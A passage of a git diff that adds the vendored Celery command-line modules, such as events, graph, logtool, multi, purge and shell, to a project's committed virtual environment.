help_group='Snapshot') +@click.option('-r', '--maxrate', + cls=CeleryOption, + help_group='Snapshot') +@click.option('-l', + '--loglevel', + default='WARNING', + cls=CeleryOption, + type=LOG_LEVEL, + help_group="Snapshot", + help="Logging level.") +@click.pass_context +@handle_preload_options +def events(ctx, dump, camera, detach, frequency, maxrate, loglevel, **kwargs): + """Event-stream utilities.""" + app = ctx.obj.app + if dump: + return _run_evdump(app) + + if camera: + return _run_evcam(camera, app=app, freq=frequency, maxrate=maxrate, + loglevel=loglevel, + detach=detach, + **kwargs) + + return _run_evtop(app) diff --git a/env/Lib/site-packages/celery/bin/graph.py b/env/Lib/site-packages/celery/bin/graph.py new file mode 100644 index 00000000..d4d6f162 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/graph.py @@ -0,0 +1,197 @@ +"""The ``celery graph`` command.""" +import sys +from operator import itemgetter + +import click + +from celery.bin.base import CeleryCommand, handle_preload_options +from celery.utils.graph import DependencyGraph, GraphFormatter + + +@click.group() +@click.pass_context +@handle_preload_options +def graph(ctx): + """The ``celery graph`` command.""" + + +@graph.command(cls=CeleryCommand, context_settings={'allow_extra_args': True}) +@click.pass_context +def bootsteps(ctx): + """Display bootsteps graph.""" + worker = ctx.obj.app.WorkController() + include = {arg.lower() for arg in ctx.args or ['worker', 'consumer']} + if 'worker' in include: + worker_graph = worker.blueprint.graph + if 'consumer' in include: + worker.blueprint.connect_with(worker.consumer.blueprint) + else: + worker_graph = worker.consumer.blueprint.graph + worker_graph.to_dot(sys.stdout) + + +@graph.command(cls=CeleryCommand, context_settings={'allow_extra_args': True}) +@click.pass_context +def workers(ctx): + """Display workers graph.""" + def simplearg(arg): + return maybe_list(itemgetter(0, 2)(arg.partition(':'))) + + def maybe_list(l, sep=','): + return l[0], l[1].split(sep) if sep in l[1] else l[1] + + args = dict(simplearg(arg) for arg in ctx.args) + generic = 'generic' in args + + def generic_label(node): + return '{} ({}://)'.format(type(node).__name__, + node._label.split('://')[0]) + + class Node: + force_label = None + scheme = {} + + def __init__(self, label, pos=None): + self._label = label + self.pos = pos + + def label(self): + return self._label + + def __str__(self): + return self.label() + + class Thread(Node): + scheme = { + 'fillcolor': 'lightcyan4', + 'fontcolor': 'yellow', + 'shape': 'oval', + 'fontsize': 10, + 'width': 0.3, + 'color': 'black', + } + + def __init__(self, label, **kwargs): + self.real_label = label + super().__init__( + label=f'thr-{next(tids)}', + pos=0, + ) + + class Formatter(GraphFormatter): + + def label(self, obj): + return obj and obj.label() + + def node(self, obj): + scheme = dict(obj.scheme) if obj.pos else obj.scheme + if isinstance(obj, Thread): + scheme['label'] = obj.real_label + return self.draw_node( + obj, dict(self.node_scheme, **scheme), + ) + + def terminal_node(self, obj): + return self.draw_node( + obj, dict(self.term_scheme, **obj.scheme), + ) + + def edge(self, a, b, **attrs): + if isinstance(a, Thread): + attrs.update(arrowhead='none', arrowtail='tee') + return self.draw_edge(a, b, self.edge_scheme, attrs) + + def subscript(n): + S = {'0': '₀', '1': '₁', '2': '₂', '3': '₃', '4': '₄', + '5': '₅', '6': '₆', '7': '₇', '8': '₈', '9': '₉'} + return ''.join([S[i] for i in str(n)]) + + class Worker(Node): + pass + + class Backend(Node): + scheme = { + 'shape': 'folder', + 'width': 2, + 'height': 1, + 'color': 'black', + 'fillcolor': 'peachpuff3', + } + + def label(self): + return generic_label(self) if generic else self._label + + class Broker(Node): + scheme = { + 'shape': 'circle', + 'fillcolor': 'cadetblue3', + 'color': 'cadetblue4', + 'height': 1, + } + + def label(self): + return generic_label(self) if generic else self._label + + from itertools import count + tids = count(1) + Wmax = int(args.get('wmax', 4) or 0) + Tmax = int(args.get('tmax', 3) or 0) + + def maybe_abbr(l, name, max=Wmax): + size = len(l) + abbr = max and size > max + if 'enumerate' in args: + l = [f'{name}{subscript(i + 1)}' + for i, obj in enumerate(l)] + if abbr: + l = l[0:max - 1] + [l[size - 1]] + l[max - 2] = '{}⎨…{}⎬'.format( + name[0], subscript(size - (max - 1))) + return l + + app = ctx.obj.app + try: + workers = args['nodes'] + threads = args.get('threads') or [] + except KeyError: + replies = app.control.inspect().stats() or {} + workers, threads = [], [] + for worker, reply in replies.items(): + workers.append(worker) + threads.append(reply['pool']['max-concurrency']) + + wlen = len(workers) + backend = args.get('backend', app.conf.result_backend) + threads_for = {} + workers = maybe_abbr(workers, 'Worker') + if Wmax and wlen > Wmax: + threads = threads[0:3] + [threads[-1]] + for i, threads in enumerate(threads): + threads_for[workers[i]] = maybe_abbr( + list(range(int(threads))), 'P', Tmax, + ) + + broker = Broker(args.get( + 'broker', app.connection_for_read().as_uri())) + backend = Backend(backend) if backend else None + deps = DependencyGraph(formatter=Formatter()) + deps.add_arc(broker) + if backend: + deps.add_arc(backend) + curworker = [0] + for i, worker in enumerate(workers): + worker = Worker(worker, pos=i) + deps.add_arc(worker) + deps.add_edge(worker, broker) + if backend: + deps.add_edge(worker, backend) + threads = threads_for.get(worker._label) + if threads: + for thread in threads: + thread = Thread(thread) + deps.add_arc(thread) + deps.add_edge(thread, worker) + + curworker[0] += 1 + + deps.to_dot(sys.stdout) diff --git a/env/Lib/site-packages/celery/bin/list.py b/env/Lib/site-packages/celery/bin/list.py new file mode 100644 index 00000000..f170e627 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/list.py @@ -0,0 +1,38 @@ +"""The ``celery list bindings`` command, used to inspect queue bindings.""" +import click + +from celery.bin.base import CeleryCommand, handle_preload_options + + +@click.group(name="list") +@click.pass_context +@handle_preload_options +def list_(ctx): + """Get info from broker. + + Note: + + For RabbitMQ the management plugin is required. + """ + + +@list_.command(cls=CeleryCommand) +@click.pass_context +def bindings(ctx): + """Inspect queue bindings.""" + # TODO: Consider using a table formatter for this command. + app = ctx.obj.app + with app.connection() as conn: + app.amqp.TaskConsumer(conn).declare() + + try: + bindings = conn.manager.get_bindings() + except NotImplementedError: + raise click.UsageError('Your transport cannot list bindings.') + + def fmt(q, e, r): + ctx.obj.echo(f'{q:<28} {e:<28} {r}') + fmt('Queue', 'Exchange', 'Routing Key') + fmt('-' * 16, '-' * 16, '-' * 16) + for b in bindings: + fmt(b['destination'], b['source'], b['routing_key']) diff --git a/env/Lib/site-packages/celery/bin/logtool.py b/env/Lib/site-packages/celery/bin/logtool.py new file mode 100644 index 00000000..ae64c3e4 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/logtool.py @@ -0,0 +1,157 @@ +"""The ``celery logtool`` command.""" +import re +from collections import Counter +from fileinput import FileInput + +import click + +from celery.bin.base import CeleryCommand, handle_preload_options + +__all__ = ('logtool',) + +RE_LOG_START = re.compile(r'^\[\d\d\d\d\-\d\d-\d\d ') +RE_TASK_RECEIVED = re.compile(r'.+?\] Received') +RE_TASK_READY = re.compile(r'.+?\] Task') +RE_TASK_INFO = re.compile(r'.+?([\w\.]+)\[(.+?)\].+') +RE_TASK_RESULT = re.compile(r'.+?[\w\.]+\[.+?\] (.+)') + +REPORT_FORMAT = """ +Report +====== +Task total: {task[total]} +Task errors: {task[errors]} +Task success: {task[succeeded]} +Task completed: {task[completed]} +Tasks +===== +{task[types].format} +""" + + +class _task_counts(list): + + @property + def format(self): + return '\n'.join('{}: {}'.format(*i) for i in self) + + +def task_info(line): + m = RE_TASK_INFO.match(line) + return m.groups() + + +class Audit: + + def __init__(self, on_task_error=None, on_trace=None, on_debug=None): + self.ids = set() + self.names = {} + self.results = {} + self.ready = set() + self.task_types = Counter() + self.task_errors = 0 + self.on_task_error = on_task_error + self.on_trace = on_trace + self.on_debug = on_debug + self.prev_line = None + + def run(self, files): + for line in FileInput(files): + self.feed(line) + return self + + def task_received(self, line, task_name, task_id): + self.names[task_id] = task_name + self.ids.add(task_id) + self.task_types[task_name] += 1 + + def task_ready(self, line, task_name, task_id, result): + self.ready.add(task_id) + self.results[task_id] = result + if 'succeeded' not in result: + self.task_error(line, task_name, task_id, result) + + def task_error(self, line, task_name, task_id, result): + self.task_errors += 1 + if self.on_task_error: + self.on_task_error(line, task_name, task_id, result) + + def feed(self, line): + if RE_LOG_START.match(line): + if RE_TASK_RECEIVED.match(line): + task_name, task_id = task_info(line) + self.task_received(line, task_name, task_id) + elif RE_TASK_READY.match(line): + task_name, task_id = task_info(line) + result = RE_TASK_RESULT.match(line) + if result: + result, = result.groups() + self.task_ready(line, task_name, task_id, result) + else: + if self.on_debug: + self.on_debug(line) + self.prev_line = line + else: + if self.on_trace: + self.on_trace('\n'.join(filter(None, [self.prev_line, line]))) + self.prev_line = None + + def incomplete_tasks(self): + return self.ids ^ self.ready + + def report(self): + return { + 'task': { + 'types': _task_counts(self.task_types.most_common()), + 'total': len(self.ids), + 'errors': self.task_errors, + 'completed': len(self.ready), + 'succeeded': len(self.ready) - self.task_errors, + } + } + + +@click.group() +@click.pass_context +@handle_preload_options +def logtool(ctx): + """The ``celery logtool`` command.""" + + +@logtool.command(cls=CeleryCommand) +@click.argument('files', nargs=-1) +@click.pass_context +def stats(ctx, files): + ctx.obj.echo(REPORT_FORMAT.format( + **Audit().run(files).report() + )) + + +@logtool.command(cls=CeleryCommand) +@click.argument('files', nargs=-1) +@click.pass_context +def traces(ctx, files): + Audit(on_trace=ctx.obj.echo).run(files) + + +@logtool.command(cls=CeleryCommand) +@click.argument('files', nargs=-1) +@click.pass_context +def errors(ctx, files): + Audit(on_task_error=lambda line, *_: ctx.obj.echo(line)).run(files) + + +@logtool.command(cls=CeleryCommand) +@click.argument('files', nargs=-1) +@click.pass_context +def incomplete(ctx, files): + audit = Audit() + audit.run(files) + for task_id in audit.incomplete_tasks(): + ctx.obj.echo(f'Did not complete: {task_id}') + + +@logtool.command(cls=CeleryCommand) +@click.argument('files', nargs=-1) +@click.pass_context +def debug(ctx, files): + Audit(on_debug=ctx.obj.echo).run(files) diff --git a/env/Lib/site-packages/celery/bin/migrate.py b/env/Lib/site-packages/celery/bin/migrate.py new file mode 100644 index 00000000..fc3c88b8 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/migrate.py @@ -0,0 +1,63 @@ +"""The ``celery migrate`` command, used to filter and move messages.""" +import click +from kombu import Connection + +from celery.bin.base import CeleryCommand, CeleryOption, handle_preload_options +from celery.contrib.migrate import migrate_tasks + + +@click.command(cls=CeleryCommand) +@click.argument('source') +@click.argument('destination') +@click.option('-n', + '--limit', + cls=CeleryOption, + type=int, + help_group='Migration Options', + help='Number of tasks to consume.') +@click.option('-t', + '--timeout', + cls=CeleryOption, + type=float, + help_group='Migration Options', + help='Timeout in seconds waiting for tasks.') +@click.option('-a', + '--ack-messages', + cls=CeleryOption, + is_flag=True, + help_group='Migration Options', + help='Ack messages from source broker.') +@click.option('-T', + '--tasks', + cls=CeleryOption, + help_group='Migration Options', + help='List of task names to filter on.') +@click.option('-Q', + '--queues', + cls=CeleryOption, + help_group='Migration Options', + help='List of queues to migrate.') +@click.option('-F', + '--forever', + cls=CeleryOption, + is_flag=True, + help_group='Migration Options', + help='Continually migrate tasks until killed.') +@click.pass_context +@handle_preload_options +def migrate(ctx, source, destination, **kwargs): + """Migrate tasks from one broker to another. + + Warning: + + This command is experimental, make sure you have a backup of + the tasks before you continue. + """ + # TODO: Use a progress bar + def on_migrate_task(state, body, message): + ctx.obj.echo(f"Migrating task {state.count}/{state.strtotal}: {body}") + + migrate_tasks(Connection(source), + Connection(destination), + callback=on_migrate_task, + **kwargs) diff --git a/env/Lib/site-packages/celery/bin/multi.py b/env/Lib/site-packages/celery/bin/multi.py new file mode 100644 index 00000000..360c3869 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/multi.py @@ -0,0 +1,480 @@ +"""Start multiple worker instances from the command-line. + +.. program:: celery multi + +Examples +======== + +.. code-block:: console + + $ # Single worker with explicit name and events enabled. + $ celery multi start Leslie -E + + $ # Pidfiles and logfiles are stored in the current directory + $ # by default. Use --pidfile and --logfile argument to change + $ # this. The abbreviation %n will be expanded to the current + $ # node name. + $ celery multi start Leslie -E --pidfile=/var/run/celery/%n.pid + --logfile=/var/log/celery/%n%I.log + + + $ # You need to add the same arguments when you restart, + $ # as these aren't persisted anywhere. + $ celery multi restart Leslie -E --pidfile=/var/run/celery/%n.pid + --logfile=/var/log/celery/%n%I.log + + $ # To stop the node, you need to specify the same pidfile. + $ celery multi stop Leslie --pidfile=/var/run/celery/%n.pid + + $ # 3 workers, with 3 processes each + $ celery multi start 3 -c 3 + celery worker -n celery1@myhost -c 3 + celery worker -n celery2@myhost -c 3 + celery worker -n celery3@myhost -c 3 + + $ # override name prefix when using range + $ celery multi start 3 --range-prefix=worker -c 3 + celery worker -n worker1@myhost -c 3 + celery worker -n worker2@myhost -c 3 + celery worker -n worker3@myhost -c 3 + + $ # start 3 named workers + $ celery multi start image video data -c 3 + celery worker -n image@myhost -c 3 + celery worker -n video@myhost -c 3 + celery worker -n data@myhost -c 3 + + $ # specify custom hostname + $ celery multi start 2 --hostname=worker.example.com -c 3 + celery worker -n celery1@worker.example.com -c 3 + celery worker -n celery2@worker.example.com -c 3 + + $ # specify fully qualified nodenames + $ celery multi start foo@worker.example.com bar@worker.example.com -c 3 + + $ # fully qualified nodenames but using the current hostname + $ celery multi start foo@%h bar@%h + + $ # Advanced example starting 10 workers in the background: + $ # * Three of the workers processes the images and video queue + $ # * Two of the workers processes the data queue with loglevel DEBUG + $ # * the rest processes the default' queue. + $ celery multi start 10 -l INFO -Q:1-3 images,video -Q:4,5 data + -Q default -L:4,5 DEBUG + + $ # You can show the commands necessary to start the workers with + $ # the 'show' command: + $ celery multi show 10 -l INFO -Q:1-3 images,video -Q:4,5 data + -Q default -L:4,5 DEBUG + + $ # Additional options are added to each celery worker's command, + $ # but you can also modify the options for ranges of, or specific workers + + $ # 3 workers: Two with 3 processes, and one with 10 processes. + $ celery multi start 3 -c 3 -c:1 10 + celery worker -n celery1@myhost -c 10 + celery worker -n celery2@myhost -c 3 + celery worker -n celery3@myhost -c 3 + + $ # can also specify options for named workers + $ celery multi start image video data -c 3 -c:image 10 + celery worker -n image@myhost -c 10 + celery worker -n video@myhost -c 3 + celery worker -n data@myhost -c 3 + + $ # ranges and lists of workers in options is also allowed: + $ # (-c:1-3 can also be written as -c:1,2,3) + $ celery multi start 5 -c 3 -c:1-3 10 + celery worker -n celery1@myhost -c 10 + celery worker -n celery2@myhost -c 10 + celery worker -n celery3@myhost -c 10 + celery worker -n celery4@myhost -c 3 + celery worker -n celery5@myhost -c 3 + + $ # lists also works with named workers + $ celery multi start foo bar baz xuzzy -c 3 -c:foo,bar,baz 10 + celery worker -n foo@myhost -c 10 + celery worker -n bar@myhost -c 10 + celery worker -n baz@myhost -c 10 + celery worker -n xuzzy@myhost -c 3 +""" +import os +import signal +import sys +from functools import wraps + +import click +from kombu.utils.objects import cached_property + +from celery import VERSION_BANNER +from celery.apps.multi import Cluster, MultiParser, NamespacedOptionParser +from celery.bin.base import CeleryCommand, handle_preload_options +from celery.platforms import EX_FAILURE, EX_OK, signals +from celery.utils import term +from celery.utils.text import pluralize + +__all__ = ('MultiTool',) + +USAGE = """\ +usage: {prog_name} start [worker options] + {prog_name} stop [-SIG (default: -TERM)] + {prog_name} restart [-SIG] [worker options] + {prog_name} kill + + {prog_name} show [worker options] + {prog_name} get hostname [-qv] [worker options] + {prog_name} names + {prog_name} expand template + {prog_name} help + +additional options (must appear after command name): + + * --nosplash: Don't display program info. + * --quiet: Don't show as much output. + * --verbose: Show more output. + * --no-color: Don't display colors. +""" + + +def main(): + sys.exit(MultiTool().execute_from_commandline(sys.argv)) + + +def splash(fun): + + @wraps(fun) + def _inner(self, *args, **kwargs): + self.splash() + return fun(self, *args, **kwargs) + return _inner + + +def using_cluster(fun): + + @wraps(fun) + def _inner(self, *argv, **kwargs): + return fun(self, self.cluster_from_argv(argv), **kwargs) + return _inner + + +def using_cluster_and_sig(fun): + + @wraps(fun) + def _inner(self, *argv, **kwargs): + p, cluster = self._cluster_from_argv(argv) + sig = self._find_sig_argument(p) + return fun(self, cluster, sig, **kwargs) + return _inner + + +class TermLogger: + + splash_text = 'celery multi v{version}' + splash_context = {'version': VERSION_BANNER} + + #: Final exit code. + retcode = 0 + + def setup_terminal(self, stdout, stderr, + nosplash=False, quiet=False, verbose=False, + no_color=False, **kwargs): + self.stdout = stdout or sys.stdout + self.stderr = stderr or sys.stderr + self.nosplash = nosplash + self.quiet = quiet + self.verbose = verbose + self.no_color = no_color + + def ok(self, m, newline=True, file=None): + self.say(m, newline=newline, file=file) + return EX_OK + + def say(self, m, newline=True, file=None): + print(m, file=file or self.stdout, end='\n' if newline else '') + + def carp(self, m, newline=True, file=None): + return self.say(m, newline, file or self.stderr) + + def error(self, msg=None): + if msg: + self.carp(msg) + self.usage() + return EX_FAILURE + + def info(self, msg, newline=True): + if self.verbose: + self.note(msg, newline=newline) + + def note(self, msg, newline=True): + if not self.quiet: + self.say(str(msg), newline=newline) + + @splash + def usage(self): + self.say(USAGE.format(prog_name=self.prog_name)) + + def splash(self): + if not self.nosplash: + self.note(self.colored.cyan( + self.splash_text.format(**self.splash_context))) + + @cached_property + def colored(self): + return term.colored(enabled=not self.no_color) + + +class MultiTool(TermLogger): + """The ``celery multi`` program.""" + + MultiParser = MultiParser + OptionParser = NamespacedOptionParser + + reserved_options = [ + ('--nosplash', 'nosplash'), + ('--quiet', 'quiet'), + ('-q', 'quiet'), + ('--verbose', 'verbose'), + ('--no-color', 'no_color'), + ] + + def __init__(self, env=None, cmd=None, + fh=None, stdout=None, stderr=None, **kwargs): + # fh is an old alias to stdout. + self.env = env + self.cmd = cmd + self.setup_terminal(stdout or fh, stderr, **kwargs) + self.fh = self.stdout + self.prog_name = 'celery multi' + self.commands = { + 'start': self.start, + 'show': self.show, + 'stop': self.stop, + 'stopwait': self.stopwait, + 'stop_verify': self.stopwait, # compat alias + 'restart': self.restart, + 'kill': self.kill, + 'names': self.names, + 'expand': self.expand, + 'get': self.get, + 'help': self.help, + } + + def execute_from_commandline(self, argv, cmd=None): + # Reserve the --nosplash|--quiet|-q/--verbose options. + argv = self._handle_reserved_options(argv) + self.cmd = cmd if cmd is not None else self.cmd + self.prog_name = os.path.basename(argv.pop(0)) + + if not self.validate_arguments(argv): + return self.error() + + return self.call_command(argv[0], argv[1:]) + + def validate_arguments(self, argv): + return argv and argv[0][0] != '-' + + def call_command(self, command, argv): + try: + return self.commands[command](*argv) or EX_OK + except KeyError: + return self.error(f'Invalid command: {command}') + + def _handle_reserved_options(self, argv): + argv = list(argv) # don't modify callers argv. + for arg, attr in self.reserved_options: + if arg in argv: + setattr(self, attr, bool(argv.pop(argv.index(arg)))) + return argv + + @splash + @using_cluster + def start(self, cluster): + self.note('> Starting nodes...') + return int(any(cluster.start())) + + @splash + @using_cluster_and_sig + def stop(self, cluster, sig, **kwargs): + return cluster.stop(sig=sig, **kwargs) + + @splash + @using_cluster_and_sig + def stopwait(self, cluster, sig, **kwargs): + return cluster.stopwait(sig=sig, **kwargs) + stop_verify = stopwait # compat + + @splash + @using_cluster_and_sig + def restart(self, cluster, sig, **kwargs): + return int(any(cluster.restart(sig=sig, **kwargs))) + + @using_cluster + def names(self, cluster): + self.say('\n'.join(n.name for n in cluster)) + + def get(self, wanted, *argv): + try: + node = self.cluster_from_argv(argv).find(wanted) + except KeyError: + return EX_FAILURE + else: + return self.ok(' '.join(node.argv)) + + @using_cluster + def show(self, cluster): + return self.ok('\n'.join( + ' '.join(node.argv_with_executable) + for node in cluster + )) + + @splash + @using_cluster + def kill(self, cluster): + return cluster.kill() + + def expand(self, template, *argv): + return self.ok('\n'.join( + node.expander(template) + for node in self.cluster_from_argv(argv) + )) + + def help(self, *argv): + self.say(__doc__) + + def _find_sig_argument(self, p, default=signal.SIGTERM): + args = p.args[len(p.values):] + for arg in reversed(args): + if len(arg) == 2 and arg[0] == '-': + try: + return int(arg[1]) + except ValueError: + pass + if arg[0] == '-': + try: + return signals.signum(arg[1:]) + except (AttributeError, TypeError): + pass + return default + + def _nodes_from_argv(self, argv, cmd=None): + cmd = cmd if cmd is not None else self.cmd + p = self.OptionParser(argv) + p.parse() + return p, self.MultiParser(cmd=cmd).parse(p) + + def cluster_from_argv(self, argv, cmd=None): + _, cluster = self._cluster_from_argv(argv, cmd=cmd) + return cluster + + def _cluster_from_argv(self, argv, cmd=None): + p, nodes = self._nodes_from_argv(argv, cmd=cmd) + return p, self.Cluster(list(nodes), cmd=cmd) + + def Cluster(self, nodes, cmd=None): + return Cluster( + nodes, + cmd=cmd, + env=self.env, + on_stopping_preamble=self.on_stopping_preamble, + on_send_signal=self.on_send_signal, + on_still_waiting_for=self.on_still_waiting_for, + on_still_waiting_progress=self.on_still_waiting_progress, + on_still_waiting_end=self.on_still_waiting_end, + on_node_start=self.on_node_start, + on_node_restart=self.on_node_restart, + on_node_shutdown_ok=self.on_node_shutdown_ok, + on_node_status=self.on_node_status, + on_node_signal_dead=self.on_node_signal_dead, + on_node_signal=self.on_node_signal, + on_node_down=self.on_node_down, + on_child_spawn=self.on_child_spawn, + on_child_signalled=self.on_child_signalled, + on_child_failure=self.on_child_failure, + ) + + def on_stopping_preamble(self, nodes): + self.note(self.colored.blue('> Stopping nodes...')) + + def on_send_signal(self, node, sig): + self.note('\t> {0.name}: {1} -> {0.pid}'.format(node, sig)) + + def on_still_waiting_for(self, nodes): + num_left = len(nodes) + if num_left: + self.note(self.colored.blue( + '> Waiting for {} {} -> {}...'.format( + num_left, pluralize(num_left, 'node'), + ', '.join(str(node.pid) for node in nodes)), + ), newline=False) + + def on_still_waiting_progress(self, nodes): + self.note('.', newline=False) + + def on_still_waiting_end(self): + self.note('') + + def on_node_signal_dead(self, node): + self.note( + 'Could not signal {0.name} ({0.pid}): No such process'.format( + node)) + + def on_node_start(self, node): + self.note(f'\t> {node.name}: ', newline=False) + + def on_node_restart(self, node): + self.note(self.colored.blue( + f'> Restarting node {node.name}: '), newline=False) + + def on_node_down(self, node): + self.note(f'> {node.name}: {self.DOWN}') + + def on_node_shutdown_ok(self, node): + self.note(f'\n\t> {node.name}: {self.OK}') + + def on_node_status(self, node, retval): + self.note(retval and self.FAILED or self.OK) + + def on_node_signal(self, node, sig): + self.note('Sending {sig} to node {0.name} ({0.pid})'.format( + node, sig=sig)) + + def on_child_spawn(self, node, argstr, env): + self.info(f' {argstr}') + + def on_child_signalled(self, node, signum): + self.note(f'* Child was terminated by signal {signum}') + + def on_child_failure(self, node, retcode): + self.note(f'* Child terminated with exit code {retcode}') + + @cached_property + def OK(self): + return str(self.colored.green('OK')) + + @cached_property + def FAILED(self): + return str(self.colored.red('FAILED')) + + @cached_property + def DOWN(self): + return str(self.colored.magenta('DOWN')) + + +@click.command( + cls=CeleryCommand, + context_settings={ + 'allow_extra_args': True, + 'ignore_unknown_options': True + } +) +@click.pass_context +@handle_preload_options +def multi(ctx, **kwargs): + """Start multiple worker instances.""" + cmd = MultiTool(quiet=ctx.obj.quiet, no_color=ctx.obj.no_color) + # In 4.x, celery multi ignores the global --app option. + # Since in 5.0 the --app option is global only we + # rearrange the arguments so that the MultiTool will parse them correctly. + args = sys.argv[1:] + args = args[args.index('multi'):] + args[:args.index('multi')] + return cmd.execute_from_commandline(args) diff --git a/env/Lib/site-packages/celery/bin/purge.py b/env/Lib/site-packages/celery/bin/purge.py new file mode 100644 index 00000000..cfb6caa9 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/purge.py @@ -0,0 +1,70 @@ +"""The ``celery purge`` program, used to delete messages from queues.""" +import click + +from celery.bin.base import COMMA_SEPARATED_LIST, CeleryCommand, CeleryOption, handle_preload_options +from celery.utils import text + + +@click.command(cls=CeleryCommand, context_settings={ + 'allow_extra_args': True +}) +@click.option('-f', + '--force', + cls=CeleryOption, + is_flag=True, + help_group='Purging Options', + help="Don't prompt for verification.") +@click.option('-Q', + '--queues', + cls=CeleryOption, + type=COMMA_SEPARATED_LIST, + help_group='Purging Options', + help="Comma separated list of queue names to purge.") +@click.option('-X', + '--exclude-queues', + cls=CeleryOption, + type=COMMA_SEPARATED_LIST, + help_group='Purging Options', + help="Comma separated list of queues names not to purge.") +@click.pass_context +@handle_preload_options +def purge(ctx, force, queues, exclude_queues, **kwargs): + """Erase all messages from all known task queues. + + Warning: + + There's no undo operation for this command. + """ + app = ctx.obj.app + queues = set(queues or app.amqp.queues.keys()) + exclude_queues = set(exclude_queues or []) + names = queues - exclude_queues + qnum = len(names) + + if names: + queues_headline = text.pluralize(qnum, 'queue') + if not force: + queue_names = ', '.join(sorted(names)) + click.confirm(f"{ctx.obj.style('WARNING', fg='red')}:" + "This will remove all tasks from " + f"{queues_headline}: {queue_names}.\n" + " There is no undo for this operation!\n\n" + "(to skip this prompt use the -f option)\n" + "Are you sure you want to delete all tasks?", + abort=True) + + def _purge(conn, queue): + try: + return conn.default_channel.queue_purge(queue) or 0 + except conn.channel_errors: + return 0 + + with app.connection_for_write() as conn: + messages = sum(_purge(conn, queue) for queue in names) + + if messages: + messages_headline = text.pluralize(messages, 'message') + ctx.obj.echo(f"Purged {messages} {messages_headline} from " + f"{qnum} known task {queues_headline}.") + else: + ctx.obj.echo(f"No messages purged from {qnum} {queues_headline}.") diff --git a/env/Lib/site-packages/celery/bin/result.py b/env/Lib/site-packages/celery/bin/result.py new file mode 100644 index 00000000..615ee2eb --- /dev/null +++ b/env/Lib/site-packages/celery/bin/result.py @@ -0,0 +1,30 @@ +"""The ``celery result`` program, used to inspect task results.""" +import click + +from celery.bin.base import CeleryCommand, CeleryOption, handle_preload_options + + +@click.command(cls=CeleryCommand) +@click.argument('task_id') +@click.option('-t', + '--task', + cls=CeleryOption, + help_group='Result Options', + help="Name of task (if custom backend).") +@click.option('--traceback', + cls=CeleryOption, + is_flag=True, + help_group='Result Options', + help="Show traceback instead.") +@click.pass_context +@handle_preload_options +def result(ctx, task_id, task, traceback): + """Print the return value for a given task id.""" + app = ctx.obj.app + + result_cls = app.tasks[task].AsyncResult if task else app.AsyncResult + task_result = result_cls(task_id) + value = task_result.traceback if traceback else task_result.get() + + # TODO: Prettify result + ctx.obj.echo(value) diff --git a/env/Lib/site-packages/celery/bin/shell.py b/env/Lib/site-packages/celery/bin/shell.py new file mode 100644 index 00000000..6c94a008 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/shell.py @@ -0,0 +1,173 @@ +"""The ``celery shell`` program, used to start a REPL.""" + +import os +import sys +from importlib import import_module + +import click + +from celery.bin.base import CeleryCommand, CeleryOption, handle_preload_options + + +def _invoke_fallback_shell(locals): + import code + try: + import readline + except ImportError: + pass + else: + import rlcompleter + readline.set_completer( + rlcompleter.Completer(locals).complete) + readline.parse_and_bind('tab:complete') + code.interact(local=locals) + + +def _invoke_bpython_shell(locals): + import bpython + bpython.embed(locals) + + +def _invoke_ipython_shell(locals): + for ip in (_ipython, _ipython_pre_10, + _ipython_terminal, _ipython_010, + _no_ipython): + try: + return ip(locals) + except ImportError: + pass + + +def _ipython(locals): + from IPython import start_ipython + start_ipython(argv=[], user_ns=locals) + + +def _ipython_pre_10(locals): # pragma: no cover + from IPython.frontend.terminal.ipapp import TerminalIPythonApp + app = TerminalIPythonApp.instance() + app.initialize(argv=[]) + app.shell.user_ns.update(locals) + app.start() + + +def _ipython_terminal(locals): # pragma: no cover + from IPython.terminal import embed + embed.TerminalInteractiveShell(user_ns=locals).mainloop() + + +def _ipython_010(locals): # pragma: no cover + from IPython.Shell import IPShell + IPShell(argv=[], user_ns=locals).mainloop() + + +def _no_ipython(self): # pragma: no cover + raise ImportError('no suitable ipython found') + + +def _invoke_default_shell(locals): + try: + import IPython # noqa + except ImportError: + try: + import bpython # noqa + except ImportError: + _invoke_fallback_shell(locals) + else: + _invoke_bpython_shell(locals) + else: + _invoke_ipython_shell(locals) + + +@click.command(cls=CeleryCommand, context_settings={ + 'allow_extra_args': True +}) +@click.option('-I', + '--ipython', + is_flag=True, + cls=CeleryOption, + help_group="Shell Options", + help="Force IPython.") +@click.option('-B', + '--bpython', + is_flag=True, + cls=CeleryOption, + help_group="Shell Options", + help="Force bpython.") +@click.option('--python', + is_flag=True, + cls=CeleryOption, + help_group="Shell Options", + help="Force default Python shell.") +@click.option('-T', + '--without-tasks', + is_flag=True, + cls=CeleryOption, + help_group="Shell Options", + help="Don't add tasks to locals.") +@click.option('--eventlet', + is_flag=True, + cls=CeleryOption, + help_group="Shell Options", + help="Use eventlet.") +@click.option('--gevent', + is_flag=True, + cls=CeleryOption, + help_group="Shell Options", + help="Use gevent.") +@click.pass_context +@handle_preload_options +def shell(ctx, ipython=False, bpython=False, + python=False, without_tasks=False, eventlet=False, + gevent=False, **kwargs): + """Start shell session with convenient access to celery symbols. + + The following symbols will be added to the main globals: + - ``celery``: the current application. + - ``chord``, ``group``, ``chain``, ``chunks``, + ``xmap``, ``xstarmap`` ``subtask``, ``Task`` + - all registered tasks. + """ + sys.path.insert(0, os.getcwd()) + if eventlet: + import_module('celery.concurrency.eventlet') + if gevent: + import_module('celery.concurrency.gevent') + import celery + app = ctx.obj.app + app.loader.import_default_modules() + + # pylint: disable=attribute-defined-outside-init + locals = { + 'app': app, + 'celery': app, + 'Task': celery.Task, + 'chord': celery.chord, + 'group': celery.group, + 'chain': celery.chain, + 'chunks': celery.chunks, + 'xmap': celery.xmap, + 'xstarmap': celery.xstarmap, + 'subtask': celery.subtask, + 'signature': celery.signature, + } + + if not without_tasks: + locals.update({ + task.__name__: task for task in app.tasks.values() + if not task.name.startswith('celery.') + }) + + if python: + _invoke_fallback_shell(locals) + elif bpython: + try: + _invoke_bpython_shell(locals) + except ImportError: + ctx.obj.echo(f'{ctx.obj.ERROR}: bpython is not installed') + elif ipython: + try: + _invoke_ipython_shell(locals) + except ImportError as e: + 